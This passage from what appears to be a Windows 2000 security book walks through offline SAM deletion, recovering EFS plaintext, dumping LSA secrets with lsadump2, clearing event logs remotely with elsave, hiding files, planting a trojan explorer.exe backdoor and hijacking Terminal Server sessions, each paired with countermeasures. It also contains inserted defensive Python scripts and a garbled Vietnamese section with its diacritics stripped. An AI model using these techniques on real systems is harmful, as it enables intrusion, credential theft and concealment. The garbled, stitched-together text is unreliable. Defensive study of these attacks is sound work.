Although Petter only offers the option of disabling SYSKEY entirely in the chntpw binary, what would happen if it were set to mode 1 rather than mode 0, storing the system key locally? This could switch off the password- or floppy-protected SYSKEY mode, rendering this countermeasure useless. The source code for chntpw is available on Petter's Web site, as is a description of how to use chntpw effectively in its Registry-editing mode. Without SYSKEY's password or floppy mode, you are left with the old security tricks, such as making sure that critical systems are physically secure, and setting a BIOS password or disabling booting from floppy.

DELETING THE SAM TO BLANK THE ADMINISTRATOR PASSWORD

Popularity:   4
Simplicity:   5
Impact:      10
Risk Rating:  6

On July 25, 1999, James J. Grace and Thomas S. V. Bartlett III published a startling paper describing how to wipe the Administrator password by booting an alternative operating system and deleting the SAM file (see http://www.deepquest.pf/win32/win2k_efs.txt). Given unchecked physical access and tools that can write to NTFS volumes (for example NTFSDOS Pro from http://www.sysinternals.com), this technique essentially walks straight through local security on NT/2000. Although the technique as published involved installing a second copy of NT or 2000 alongside the original, that is not actually necessary if the attacker only wants to blank the Administrator account's password: the SAM can simply be deleted. This attack can have serious consequences for the Encrypting File System (EFS), as we discuss in detail later.


NOTE: Windows 2000 domain controllers are not affected by deleting the SAM, because they do not store password hashes in the SAM. However, Grace and Bartlett's analysis describes a mechanism for obtaining the same result on domain controllers by installing a second copy of Windows 2000.

Stopping Offline SAM Deletion

As we have seen, the only way to begin mitigating this attack is to configure Windows 2000 to boot in SYSKEY's password or floppy mode. Other effective ways of preventing offline password attacks are keeping the server physically secure, removing or disabling the floppy drive, and setting a BIOS password that must be entered before the system boots. We recommend all of these mechanisms.

Encrypting File System (EFS)

One of the major security focal points in Windows 2000 is the Encrypting File System (EFS). EFS is a public-key-based system for encrypting data on disk in near-real time, intended to defeat attackers who gain access to the system. Microsoft has published a white paper detailing how EFS works: http://www.microsoft.com/windows2000/techinfo/howitworks/security/encrypt.asp. EFS can encrypt a file or folder with a fast, symmetric encryption algorithm using a randomly generated file encryption key (FEK) specific to that file or folder. The initial release of EFS uses the Extended Data Encryption Standard (DESX) as its algorithm. The randomly generated FEK is then itself encrypted with one or more public keys, including the user's (every Windows 2000 user receives a public/private key pair) and that of a key recovery agent (RA). These encrypted values are stored as attributes of the file. The recovery agent comes into play when, for example, a user who has encrypted sensitive data loses the system or loses his or her encryption keys. To prevent unrecoverable loss of encrypted data, Windows 2000 mandates a data recovery agent for EFS; EFS will not work without one. A recovery agent can decrypt a file's contents without the user's private key, because the FEK is completely independent of the user's public/private key pair. The default data recovery agent for a system is the local Administrator account.


Although EFS can be very useful in many situations, it does nothing to protect files from users who share the same workstation; that is the job of the NTFS file system's access control lists (ACLs). Microsoft positions EFS as a layer of protection against attacks in which NTFS is circumvented, for example by booting an alternative operating system and using third-party tools to access the hard disk, or by stealing files stored on a remote server. Indeed, Microsoft's EFS documentation focuses on how EFS addresses the security problems posed by tools available on other operating systems that let a user physically access files on an NTFS volume without any access checks. We look at this more closely later in the chapter.

How EFS Works

EFS can be used to encrypt a file or folder from the file's Properties sheet by clicking the Advanced button. In addition, the cipher command-line tool can be used to encrypt and decrypt files; for its syntax, type cipher /? at a command prompt. Although individual files can be encrypted, Microsoft recommends applying EFS at the folder level. The reason is that encrypting a single file is sometimes defeated because temporary copies are created in plaintext, and an encrypted file cannot also be compressed. The Windows 2000 Help on EFS will give you the remaining skills needed to use EFS well.

NOTE: Be careful when using cut to move encrypted files. Although standard backup mechanisms (for example ntbackup.exe) back up the ciphertext, an ordinary copy reads the source file's contents in decrypted form. If the destination of the moved file is not an NTFS 5.0 volume, the moved file is plaintext. If the destination is an NTFS 5.0 volume, the file remains encrypted but is no longer identical to the original, because a new file encryption key (FEK) is used. Remember also that EFS only encrypts files while they are stored on disk; a file is not encrypted when it is sent across the network.

V hiu ha kha khi phc EFS

http://itlab.com.vn

Tnh 3 Tnh 1 Tnh 10 Mc 5

ph n hiu r i

bin gin qu ro

Chng ta tip tc nghin cu ti liu m Grace v Bartlet gii thiu phn trc ti a ch http://www.deepquest.pf/win32/win2k_efs.txt , kh nng ghi chn d liu ln m chng mc Administrator c thc hin trn mt phm vi rng hn khi my ngm hiu Administrator l mt tc nhn phc hi m mc nh (RA). Khi t nhp thnh cng vo mt h thng bng mt mt m Administrator trng, cc tp tin c m ho di dng EFS s t ng gii m khi m tp tin, t c th dng chnh mt khu khi phc m truy cp cc tp b m ho. V sao chc nng ny hot ng? Hy nh li cch thc hot ng ca h thng m ho tp: Mt khu m ho tp (cng dng gii m tp) c thit lp ngu nhin cng c th t lp m bng nhng phm khc, v nhng bin s m ho ny c lu tr nh nhng thuc tnh tp. FEK c lp m bng nhng kho chung ca khch hng (mi khch hng s dng h iu hnh Windows 2000 s nhn c mt mt khu c nhn hay mt khu dng chung) c lu di dng thuc tnh tp gi l Trng Gii M D Liu (DDF) c kt hp vi tp tin. Khi ngi dng truy cp vo tp tin ny, m cc nhn ca ngi y s gii m DDF, v s tm c FEK gii m tp tin . Nhng bin s thu c t vic gii m FEK cng vi m tc nhn phc hi s c lu di dng thuc tnh c tn Trng Phc Hi D Liu (DRF). V vy, nu Administrator cc b l tc nhn phc hi xc nh (thng mc nh), th bt k ai c m Administrator trong h thng ny s c th gii m DRF bng mt khu c nhn ca mnh ri gii lun c m FEK, y chnh l cha kho gii m cc tp tin c bo mt di dng EFS. Xa y nhim Tc nhn Phc hi Hy xem iu g xy ra nu tc nhn phc hi c giao cho ngi khc m khng phi l Administrator? Grace v Bartlett s cung cp cho cc bn bin php i ph bng mt chng trnh chy ngay khi khi ng my v xc lp li mt m cho bt k mt chng mc no c xc nh l tc nhn phc hi. Tt nhin mt k t nhp khng cn ch tp chung vo tc nhn phc hi v n ch nht thi to ra mt phng thc d tip cn nht i vi cc tp b m ho trn a.Mt cch khc trnh xung t vi tc nhn phc hi c u thc l gi dng lm ngi m ho tp . S dng chntpw (xem phn trc), mi m chng mc ca ngi s dng u c th xc lp li


by means of an offline attack. The attacker can then log on to the system as the user who encrypted the file, whose DDF is tied to that user's private key, and decrypt the FEK and then the file. The recovery agent's private key is never needed.

Export the Recovery Keys and Store Them Safely

Grace and Bartlett have forced Microsoft to concede that EFS can be broken, but Microsoft lessens the risk by asserting that the attack fails if the recovery key export procedure has been followed (see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/efs/asp). Unfortunately, Microsoft's description of the process on that page is out of date, and the EFS help files may not show how to carry it out. To export the recovery agent certificate on standalone systems, open Group Policy (gpedit.msc), navigate to Computer Configuration\Windows Settings\Security Settings\Public Key Policies\Encrypted Data Recovery Agents, right-click the appropriate recovery agent (usually Administrator), and choose All Tasks/Export, as shown here:

A wizard opens and walks you through a series of prompts before the key is exported. To back up the recovery agent key, you must export the private key together with the certificate, and you should protect it strongly (require a password). Finally, DELETE THE PRIVATE KEY IF THE EXPORT SUCCEEDS. This last step removes the recovery agent's decryption key from the local system.

WARNING: Do not delete the entire recovery agent certificate from the wizard's pane. Doing so leaves EFS in Windows 2000 with no recovery agent at all. The following illustrates what happens when EFS is used with no recovery agent key: it simply does not work.


NOTE Items encrypted before the recovery agent was deleted remain encrypted, but they can only be recovered if the user restores the RA key saved earlier.

For machines joined to a domain, the story is different: the domain controller stores the recovery keys for all machines in the domain. When a Windows 2000 machine joins a domain, the Default Domain Recovery Policy takes effect automatically. The domain Administrator, not the local Administrator, becomes the recovery agent. The domain Administrator thereby keeps the recovery keys separate from the encrypted data, which makes the Grace and Bartlett attack considerably harder. It is also wise to export the recovery agent certificate from the domain controller. If these agents are compromised, every system in the domain is exposed, just as it is when recovery keys live on the local machines.

NOTE Microsoft also asserts in one of its EFS pages that the problem of deleting the SAM, which resets the Administrator password to blank, can be addressed with SYSKEY. We have shown this to be completely wrong unless SYSKEY is set to password or floppy-disk mode. (That page does not mention this.)

EFS Temporary File Data Recovery


Popularity: 8
Simplicity: 10
Impact: 10
Risk Rating: 9

On January 19, 2001, Richard Berglind posted a very interesting finding to a security mailing list (Bugtraq). It turns out that when a file is selected for EFS encryption, it does not in the end stay protected. A backup copy of the file is first moved to a temporary directory and renamed efs0.tmp. The data from this file is then encrypted


and written back in place of the original file. The backup is deleted automatically when encryption finishes. However, after the encrypted data replaces the original and the temporary file is deleted, the physical blocks in the file system where the temporary file resided are never wiped. Those blocks still hold the original, unencrypted data. Deleting the temporary file works like deleting any other file: the entry in the file table is simply marked free and the clusters that held the file are marked as available, but the physical file and the plaintext it contains remain on the physical disk. As new files are written to the disk, that data is gradually overwritten; but if the encrypted file was large, it may remain on disk for months afterwards (depending on disk size).

Responding to Richard's finding, Microsoft asserted that this case is by design for files encrypted individually with EFS, and pointed out that the EFS white papers explain this clearly. The company also offered a few tricks for avoiding the situation and promised to study the issue further.

How does one go about reading data encrypted with EFS in this way? A low-level disk editor extracts it easily, for example dskprobe.exe from the Support Tools on the Windows 2000 installation CD. It lets a user with access to the server easily dig out encrypted file data. Here is how to use dskprobe to read the efs0.tmp file.

First, run dskprobe and open the appropriate physical disk for reading by selecting Drives/Physical Drive and right-clicking the appropriate disk in the upper-left pane of the window. Then click Set Active next to the disk shown under Handle 0 in the dialog box.

With the first step complete, the second step is to locate the sector containing the data you want to identify. Finding files on a physical disk is extremely difficult, but dskprobe's Tools/Search Sectors command supports the search. In the example in Figure 6-3, we search for the string efs0.tmp from sector 0 to the end of the disk. You should also check Exhaustive Search, Ignore Case, and Unicode. (Searching for ASCII usually finds nothing.)

Third, when the search finishes, if EFS has been used to encrypt files on the disk being analyzed, and if efs0.tmp has not been overwritten by disk activity, its contents are displayed in the dskprobe window. The search for the string efs0.tmp will also


turn up other locations on disk that contain the string (a file named efs0.log also holds a fully qualified path reference to efs0.tmp). Another way to find the efs0.tmp file itself, rather than files that merely refer to it, is to look for the string FILE at the top of the dskprobe display, which marks the sector as holding a file record. Both efs0.log and efs0.tmp appear to be created under the same path as the encrypted file, but they are never visible through the standard interface, only in dskprobe. In Figure 6-3, a sample efs0.tmp discovered in sector 21249 is shown in dskprobe with its full contents. (Again, note the FILE* string at the top, which marks a file record.)
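As an added illustration (not from the original text and not a Microsoft tool), the following Python script performs the same Unicode, case-insensitive sector search offline on a raw disk image, so an administrator can audit an image for efs0.tmp remnants before trusting that EFS left no plaintext behind; the image bytes, the sector numbers and the plaintext string are constructed in memory for the demonstration.

```python
"""Scan a raw disk image for leftover EFS temporary-file remnants.

Added example, not part of the original text: it reproduces offline what
the text does interactively with dskprobe (Tools/Search Sectors, Unicode,
Ignore Case, Exhaustive), so a defender can audit an image for
unencrypted efs0.tmp remnants. The image below is constructed in memory.
"""

SECTOR_SIZE = 512            # assumption: 512-byte sectors
MFT_SIGNATURE = b"FILE"      # signature at the start of an NTFS MFT record


def build_sample_image(total_sectors: int = 64) -> bytes:
    """Construct a fake disk image (not a real NTFS volume, only the byte
    patterns the search relies on): one MFT-style record naming efs0.tmp
    in UTF-16LE, one log-style path reference, and orphaned plaintext."""
    image = bytearray(SECTOR_SIZE * total_sectors)
    # Sector 21: an MFT-style record whose name attribute is efs0.tmp.
    rec = bytearray(MFT_SIGNATURE) + b"\x00" * 60
    rec += "efs0.tmp".encode("utf-16-le")
    image[21 * SECTOR_SIZE:21 * SECTOR_SIZE + len(rec)] = rec
    # Sector 40: a log-style reference with the full path, also UTF-16LE.
    ref = "C:\\Secret\\efs0.tmp".encode("utf-16-le")
    image[40 * SECTOR_SIZE:40 * SECTOR_SIZE + len(ref)] = ref
    # Sector 45: plaintext that was never wiped (ASCII here, so a
    # Unicode-only search would miss it; the scanner checks both).
    plain = b"Merger terms: confidential draft"
    image[45 * SECTOR_SIZE:45 * SECTOR_SIZE + len(plain)] = plain
    return bytes(image)


def find_string_sectors(image: bytes, needle: str, ignore_case: bool = True):
    """Return sorted sector numbers where needle occurs, checking both the
    UTF-16LE encoding (dskprobe's Unicode option) and plain ASCII."""
    hits = set()
    hay = image.lower() if ignore_case else image
    for pattern in (needle.encode("utf-16-le"), needle.encode("ascii")):
        if ignore_case:
            pattern = pattern.lower()
        pos = hay.find(pattern)
        while pos != -1:
            hits.add(pos // SECTOR_SIZE)
            pos = hay.find(pattern, pos + 1)
    return sorted(hits)


def sectors_with_mft_records(image: bytes):
    """Sectors that begin with the FILE signature, i.e. file records."""
    return [s for s in range(len(image) // SECTOR_SIZE)
            if image[s * SECTOR_SIZE:s * SECTOR_SIZE + 4] == MFT_SIGNATURE]


def audit_image(image: bytes) -> dict:
    """Summarise the evidence the way an analyst reads the dskprobe view:
    which hits are file records and which are mere references."""
    name_hits = find_string_sectors(image, "efs0.tmp")
    records = set(sectors_with_mft_records(image))
    return {
        "efs0_tmp_sectors": name_hits,
        "mft_record_sectors": sorted(records & set(name_hits)),
        "other_reference_sectors": sorted(set(name_hits) - records),
    }


if __name__ == "__main__":
    print(audit_image(build_sample_image()))
```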

NOTE An attacker can run dskprobe over the network through a remote-control interface or a Terminal Server session, not just from the physical console. With a low-level disk editor the attacker is no longer limited to deleting the SAM or tweaking a few things in it; he can dig out EFS-protected files in vulnerable environments.

Blocking EFS Temporary File Recovery

As this book goes to press, Microsoft has not released a fix for this problem. It has, however, responded to the Bugtraq post mentioned above. Microsoft notes that the plaintext backup file is created only when a pre-existing file is encrypted. If the file is created inside a folder that is already encrypted, it is encrypted immediately and no separate plaintext backup is created. Microsoft recommends this as a best practice for using EFS to protect sensitive data, as described in Encrypting File System for Windows 2000 (see http://www.microsoft.com/technet/treeview/default.asp?url=TechNet/prodtechnol/windows2000serv/deploy/confeat/nt5efs.asp):


We recommend that you always start by creating an empty encrypted folder and then create files directly in that folder. This ensures that no plaintext bits of the file are ever stored anywhere on disk. It also performs better, because EFS no longer has to create a backup copy and then delete it.

Bottom line: rather than encrypting individual files, first encrypt a folder that will hold all protected data, and then create sensitive files only inside that folder.

EXPLOITING TRUSTS

One of the most effective tricks attackers use is to find accounts from trusted domains (or local accounts) that are also valid in other domains. This lets an attacker hop easily from standalone servers to domain controllers and across security boundaries. System administrators themselves hand attackers this opportunity when they log on to a standalone box using accounts from other domains trusted by the domain controller. Windows 2000 protects no one from such mistakes!

LSA Secrets Alive and Well

Popularity: 8
Simplicity: 10
Impact: 10
Risk Rating: 9

As described in Chapter 5, the LSA Secrets weakness is the key to exploiting external trust relationships, because it reveals the last few users who logged on to the system and the passwords of service accounts. Although Microsoft issued a fix for LSA Secrets after Service Pack 3, a great deal of sensitive data can still be extracted with the lsadump2 utility from Todd Sabin (see http://razor.bindview.com/tools/desc/lsadump2_readme.html). Here is an example of lsadump2 pulling a service account from a Windows 2000 domain controller. The last entry shows the BckpSvr service logging on with the password password1234.


C:\>lsadump2
$MACHINE.ACC
 7D 58 DA 95 69 3E 3E 9E AC C1 B8 09 F1 06 C4 9E   }x..i>>..
 6A BE DA 2D F7 94 B4 90 B2 39 D7 77               j..-..9.w
TermServLicentingSignKey-12d4b7c8-77d5-11d5-11d1-8c24-00c04fa3080d
. . .
TS:InternetConnectiorPswd
 36 00 36 2B 00 32 00 48 00 68 00 32 00 62 00      6.6.+ 2.H.h.2.b.
 44 00 55 00 41 00 44 00 47 00 50 00 00 00         D..A.D.G.P
. . .
SCBckpSvr
 74 00 65 00 73 00 74 00 75 00 73 00 53 00 72 00   p.a.s.s.w.o.r.d.
 31 00 32 00 33 00 34 00                           1.2.3.4.

Once the service password is known, the attacker can use built-in utilities such as net user and the Resource Kit's nltest /TRUSTED_DOMAINS to enumerate user accounts and trust relationships on the same system (easy to do with Administrator privileges). This may reveal a user account named bckp (or similar) and one or more trusts with external domains. Logging on to those domains with bckp/password1234 then has a high chance of success.

lsadump2 Countermeasure


Microsoft does not consider this a security vulnerability, because running lsadump2 requires SeDebugPrivilege, which by default is granted only to Administrators. The best defense against lsadump2 is to keep Administrator accounts from being compromised in the first place. If the worst happens and Administrator is compromised, however, service accounts from external trusted domains can still be extracted with lsadump2, and there is nothing you can do about it.

Multimaster Replication and the New Trust Model


One of the fundamental changes to the NT4 domain structure in Windows 2000 is the move from single-master replication and the old trust model to multimaster replication. In a Windows 2000 architecture, all domains replicate a shared Active Directory and trust one another through two-way transitive trusts based on Kerberos. (Trusts between forests or with NT4 domains remain one-way.) This is a sound approach to domain-structure design. Most domain administrators' first instinct is to create separate forests for each security perimeter in the organization. That is completely wrong: the whole point of AD is to consolidate domains under one management umbrella. A great deal of access control can still be maintained over objects in the forest, although the many permission settings Microsoft provides will leave administrators bewildered. The new directory containers (Organizational Units [OUs]) and the new delegation feature have a large influence here.

Nevertheless, with this new model, members of Universal Groups (for example, Enterprise Admins) and, one level down, Domain Global Groups (for example, Domain Admins) can reach every domain in the forest. So an account compromised in one of these groups can affect the other domains in the forest. We therefore recommend that larger entities which are not fully trusted (for example, a sister organization) or not immune to outside compromise (for example, a network data center) be placed in a separate forest, or operated entirely as standalone servers. Note also that with two-way transitive trusts, the Authenticated Users group now spans the entire forest. In large companies, it must be regarded as an untrusted group.

COVERING TRACKS

The techniques and tools used to cover tracks all still work (for the most part) in Windows 2000. Where they differ, the differences are pointed out below.

Disabling Auditing

Auditing can be configured through Local Security Policy (secpol.msc) under \Local Policy\Audit Policy, or through the Group Policy tool (gpedit.msc) under \Computer Configuration\Windows Settings\Security Settings\Local Policy\Audit Policy. We return to Group Policy at the end of this chapter.

Audit settings are essentially unchanged from NT4. Windows 2000 still has no centralized logging: all logs are stored on the local system, which is a real nuisance compared with


UNIX syslog. And of course Windows 2000 declines to record the Internet addresses of remote connections for events such as failed logons. Some things, it seems, never change.

Besides the Group Policy audit-configuration interface, the auditpol utility from the NTRK still works exactly as discussed in Chapter 5. auditpol can enable or disable auditing. Where would we be without the NTRK?

Clearing the Event Log

Naturally, the Event Log can still be cleared in Windows 2000, although the logs are reached through a new interface. The various Event Logs are now found in the Computer Management MMC under \System Tools\Event Viewer. Alongside the three existing logs there are new ones: Directory Service, DNS Server, and File Replication Service. Right-clicking any log brings up a menu containing a Clear All Events entry. The elsave utility from Chapter 5 clears any of the logs remotely (including the new ones). The following example shows the elsave syntax for clearing the File Replication Service log on the server joel. (The appropriate privileges are required on the remote system.)

C:\>elsave -s \\joel -l "File Replication Service" -C

Another trick that works as Administrator on a compromised server is to launch a command shell under the SYSTEM account. This is easily done with the AT scheduler. Once the shell is up, open the Event Log MMC (compmgmt.msc) and clear the logs. An entry still records that the logs were cleared, but the account shown as having cleared them is SYSTEM.

Hiding Files

One important step after a successful break-in is to wipe out the subtle traces the intruder leaves behind. We looked at two ways to hide files in Chapter 5: the attrib command and file streams.

Attrib

Attrib still hides files, but the hidden files are still displayed when Show All Files is applied to the folder.


Streams

Using the NTRK's POSIX utility to hide files in streams behind other files (see Chapter 5) still works in Windows 2000, even with the new NTFS version. The best way to detect streamed files is the sfind tool from NTObjectives. sfind is included in the Forensic Toolkit, available at http://www.foundstone.com/rdlabs/tools.php?category=Forensic.

BACK DOORS

Last on the attacker's checklist is creating future opportunities to return to the compromised system, hopefully without being noticed by the system administrator.

Startup Manipulation

As described in Chapter 5, a common attacker trick is to attach inconspicuous self-launching programs to locations that run automatically at predetermined times. These locations still exist in Windows 2000 and should be checked for strange commands on compromised systems. Once again, the relevant startup values in the Registry are located under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion:

\Run
\RunOnce
\RunOnceEx

One small difference in Windows 2000 is the location of the user's Startup folder. In Windows 2000 the Startup folder lives under a different folder, Documents and Settings at the root (%systemdrive%\Documents and Settings\%user%\Start Menu\Programs\Startup).

Booby-Trapping the Executable Path

Popularity: 7
Simplicity: 7
Impact: 10
Risk Rating: 8


Sometimes the back doors we know about are the hardest to spot. Consider the simple placement of a Trojan Windows utility named explorer.exe at the root of the %systemdrive% path on a target system. (Any user can write there by default.) The next time any user logs on interactively, this self-launched program becomes the default shell for that user. Why does this happen? As documented in the Microsoft Software Development Kit (SDK), when an executable or DLL is not specified with a path in the Registry, Windows NT 4.0/2000 searches for the file in the following order:

1. The directory from which the application loaded
2. The current directory of the calling process
3. The 32-bit system directory (%windir%\System32)
4. The 16-bit system directory (%windir%\System)
5. The Windows directory (%windir%)
6. The directories listed in the PATH environment variable

This is demonstrated by the default NT/2000 shell, identified by the Registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell. The default value of this key is explorer.exe; no file path is specified. So if anyone copies a modified program named explorer.exe to the root of %SystemDrive% (for example, C:\), then at the appointed time the explorer.exe value under Winlogon\Shell is read, the file system is searched starting at the root (because the current directory while the system starts up is %systemdrive%), and our modified explorer.exe is found. It becomes the shell for that logon session. As Alberto Aragones writes at http://www.quimeras.com/secadv/ntpath.htm, this is easily demonstrated by copying the NT/2000 command shell (cmd.exe) to the system root, logging off, and logging back on. The standard Windows shell is replaced by a command prompt. As we will see in Chapter 14, tools such as eLiTeWrap make it easy to bundle multiple programs together, and the bundled programs can run hidden and asynchronously if desired. Anyone can easily bind a back door (such as Back Orifice 2000) to a copy of explorer.exe, drop it at the system root, and the program will launch silently whenever an interactive logon occurs.

Explorer appears to run normally, so nobody is any the wiser.


On the same page, http://www.quimeras.com/secadv/ntpath.htm, Alberto also describes a convenient way to carry out this trick remotely. It relies on the target running the NT/2000 telnet service. First connect to the target and upload the back-door explorer.exe (via FTP). Then, from the telnet command line, change to %windir%, run the real explorer.exe, and end the telnet session. The fake explorer.exe then runs in any subsequent interactive logon session.

This technique also applies to DLLs. When Windows executables import dynamic libraries, the information in the executable is used to locate the required DLLs by name. The system looks for the DLLs in exactly the same search order as above, so the same problem arises.

Path Countermeasure

This was addressed in MS00-052, which is not included in Service Pack 1, so it must be applied whether or not you are running a system with that Service Pack. Although Microsoft's FAQ for this vulnerability (http://www.microsoft.com/technet/security/bulletin/fq00-52.asp) claims that, among the Registry values Microsoft ships, only the Shell value uses a relative path (to support legacy applications), Alberto Aragones asserts that many executables lack correct paths in the Registry (for example rundll32.exe). Indeed, rundll32.exe can be found in many places in the Registry without a real path. An alternative is to hunt down every relative path in the Registry and convert it to an absolute path. Even if a complete and accurate list of vulnerable files existed, fixing them all would take a great deal of effort and time. Things become easier if you follow sound practices and prevent interactive logons to servers (deploying Terminal Server makes this somewhat harder). And of course, apply the fix (see above). Given the application-compatibility concerns just mentioned, the fix removes the vulnerability by inserting a special string into the startup code that resolves %systemroot% before the value in Shell is read.

TIP: If someone has pulled Alberto's trick on your machine, you may be puzzled about how to get the system back to normal. Alberto recommends running %windir%\explorer.exe from the command prompt and then deleting the rogue explorer, or you can simply type ren \explorer.exe harmless.txt and then press CTRL-ALT-DEL to restart.
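To audit for this class of problem (the search-order behaviour in the preceding section and the relative-path Registry values the countermeasure above warns about), the following Python script, an added example that is not Alberto's or Microsoft's code, resolves an executable name through the six-step search order and flags Registry values that name a program without a directory; the C:\WINNT system root, the directory listing and the Registry values are constructed for the demonstration.

```python
"""Resolve an unqualified executable name the way Windows NT 4.0/2000
searches for it, and flag Registry startup values that omit a directory.

Added example, not from the original text, Alberto Aragones or Microsoft.
The six-step search order is the one listed in the text; the system root,
the directory listing and the Registry values are constructed for the
demonstration (assumptions), not read from a live machine.
"""
import ntpath

WINDIR = r"C:\WINNT"          # assumed system root of the box being audited
SYSTEMDRIVE_ROOT = "C:\\"     # current directory while the system starts up

# Constructed directory snapshot: directory -> file names it contains.
# A copy of explorer.exe has been planted at the root of the system drive.
SAMPLE_LISTING = {
    r"C:\WINNT\System32": {"winlogon.exe", "rundll32.exe", "userinit.exe"},
    r"C:\WINNT": {"explorer.exe"},
    "C:\\": {"explorer.exe", "boot.ini"},
}

# Constructed Registry values, modelled on Winlogon and Run entries.
SAMPLE_VALUES = {
    "Winlogon\\Shell": "explorer.exe",
    "Winlogon\\Userinit": r"C:\WINNT\system32\userinit.exe,",
    "Run\\Sync": "rundll32.exe shell32.dll,Control_RunDLL",
    "Run\\Backup": r'"C:\Program Files\Backup\bkup.exe" /quiet',
}


def search_order(app_dir, cwd, path_env=()):
    """Steps 1-6 from the SDK: application directory, current directory,
    System32, System, the Windows directory, then each PATH entry."""
    return [app_dir, cwd, ntpath.join(WINDIR, "System32"),
            ntpath.join(WINDIR, "System"), WINDIR] + list(path_env)


def _has(listing, directory, name):
    """Case-insensitive file-name lookup in one directory of the snapshot."""
    return name.lower() in {n.lower() for n in listing.get(directory, ())}


def resolve(exe, listing, app_dir, cwd, path_env=()):
    """Return the directory that would supply `exe`, or None.
    A fully qualified name is looked up directly; a bare name walks the
    search order and stops at the first directory holding it."""
    if ntpath.isabs(exe):
        directory, name = ntpath.split(exe)
        return directory if _has(listing, directory, name) else None
    for directory in search_order(app_dir, cwd, path_env):
        if _has(listing, directory, exe):
            return directory
    return None


def audit_shell_value(shell_value, listing):
    """Check the Winlogon Shell value. winlogon.exe loads from System32
    (step 1) and the current directory at startup is the system drive root
    (step 2); both are searched before %windir% (step 5), where the real
    explorer.exe lives, so a planted copy at the root wins."""
    resolved = resolve(shell_value, listing,
                       app_dir=ntpath.join(WINDIR, "System32"),
                       cwd=SYSTEMDRIVE_ROOT)
    return {
        "value": shell_value,
        "fully_qualified": ntpath.isabs(shell_value),
        "resolved_dir": resolved,
        "hijacked": resolved is not None and resolved.lower() != WINDIR.lower(),
    }


def unqualified_values(values):
    """Return {value name: program} for Registry values whose program is
    given as a bare file name, i.e. candidates for this search-order
    problem. Quoted paths are honoured; the rest split on whitespace."""
    flagged = {}
    for name, command in values.items():
        command = command.strip()
        if not command:
            continue
        program = command.split('"')[1] if command.startswith('"') else command.split()[0]
        if not ntpath.dirname(program):
            flagged[name] = program
    return flagged


if __name__ == "__main__":
    print(audit_shell_value(SAMPLE_VALUES["Winlogon\\Shell"], SAMPLE_LISTING))
    print(unqualified_values(SAMPLE_VALUES))
```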


Remote Control

All the remote-control mechanisms covered in Chapter 5 still work as before. The NTRK remote-control tool ships in the Windows 2000 Support Tools (the new home of many important RK utilities) as an updated version called wsremote, but it is essentially the same as before. NetBus and WinVNC both work unchanged. Back Orifice 2000 (BO2K) also runs on Windows 2000. All those administrators who thought the original BO ran only on Win9x now have something to worry about again.

Terminal Server

Of course, a major addition to Windows 2000 is the availability of Terminal Server as part of the core Server products. Installing Terminal Server turns Windows into an altogether different system, one in which every client process runs in the server's CPU space. In all earlier Windows versions, except the separately developed NT Terminal Server Edition, client processes always ran on the client's own processor. This is no revolution for UNIX and mainframe people, who have worked this way since the dawn of computing, but NT/2000 administrators will need to get used to the difference between console logon sessions and remote interactive sessions.

As we saw earlier, identifying a system with TCP port 3389 open is almost a sure bet for Terminal Server. The attacker then switches to the Terminal Services Client. (The client setup fits on two floppies and can be found in the %windir%\system32\clients folder of a Windows 2000 server.) At this point an attacker can mount password-guessing attacks against the Administrator account. Because this counts as an interactive logon, such attacks can continue against a Windows 2000 domain controller even when passprop /adminlockout has been enabled (see Chapter 5 for more on passprop). The Terminal Services Client does disconnect after five failed attempts, however, which makes this a time-consuming process.

Hijacking Disconnected Server Connections

Popularity: 2
Simplicity: 3
Impact: 10
Risk Rating: 5

Things get much more interesting for an attacker who has obtained Administrator privileges on Terminal Server. If the last Administrator forgot to log off a terminal session (or several), then when the attacker connects with Administrator credentials he is presented with the following dialog:

The disconnected session may have a sensitive document or other data open, or applications running, which the attacker can rummage through at leisure by hand.

Logging Off Terminal Sessions


Simply closing the client window or choosing Disconnect leaves the session active. Make sure you choose Log Off from Start or Shut Down, or use the Terminal Server Client's CTRL-ALT-END shortcut. The other shortcut keys available in the Terminal Services Client are listed here:

CTRL-ALT-END: Opens the Windows Security dialog box.
ALT-PAGE UP: Switches between programs from left to right.
ALT-PAGE DOWN: Switches between programs from right to left.
ALT-INSERT: Cycles through programs in the order they were started.
ALT-HOME: Displays the Start menu.
CTRL-ALT-BREAK: Switches the client between a window (if applicable) and full screen.
ALT-DEL: Displays the window's pop-up menu.
CTRL-ALT-MINUS (-): Places a snapshot of the active window, within the client, on the Terminal Server clipboard, using the minus key on the numeric keypad. (Pressing ALT-PRINTSCRN on a local computer has the same effect.)
CTRL-ALT-PLUS (+): Places a snapshot of the entire client window area on the Terminal Server clipboard, using the plus key on the numeric keypad. (Pressing ALT-PRINTSCRN on a local computer has the same effect.)

TIP: A free SSH1-compatible server for Windows 2000 is available at http://marvin.criadvantage.com/caspian/Software/SSHD-NT/default.php, and several commercial SSH2 servers are also available. Secure Shell (SSH) has been the basis of secure remote administration in the UNIX world for years and is a powerful command-line alternative to Terminal Server for remote administration of Windows 2000. (See the Secure Shell FAQ at http://www.employees.org/~satch/ssh/faq/ssh-faq.html for more details on SSH.)

Keystroke Loggers

The NetBus keystroke logger and Invisible Keylogger Stealth (IKS), both discussed in Chapter 5, still work fine in Windows 2000.

GENERAL COUNTERMEASURES: NEW WINDOWS SECURITY TOOLS

Windows 2000 provides new security management tools that centralize much of the functionality that was scattered across NT4. These utilities are very useful for securing a system, or simply for managing its configuration so that the system stays free of the flaws described above.

Group Policy


One of the most powerful new tools in Windows 2000 is Group Policy, which we have touched on several times in this chapter. Group Policy Objects (GPOs) can be stored in AD or on a local machine to define configuration parameters at the domain or local level. GPOs can be applied to sites, domains, or organizational units


(OUs) and are inherited by the users or computers they contain (called GPO members). GPOs can be viewed and edited in any MMC console window (Administrator privileges required). The GPOs that ship with Windows 2000 are Local Computer, Default Domain, and Default Domain Controllers Policy. Simply running Start/gpedit.msc opens the Local Computer GPO. Another way to view GPOs is to open the Properties of a given directory object (domain, OU, or site) and choose the Group Policy tab, as illustrated below. This screen shows the specific GPOs that apply to the selected object (listed in order of precedence) and whether inheritance is blocked, and allows the GPOs to be edited.

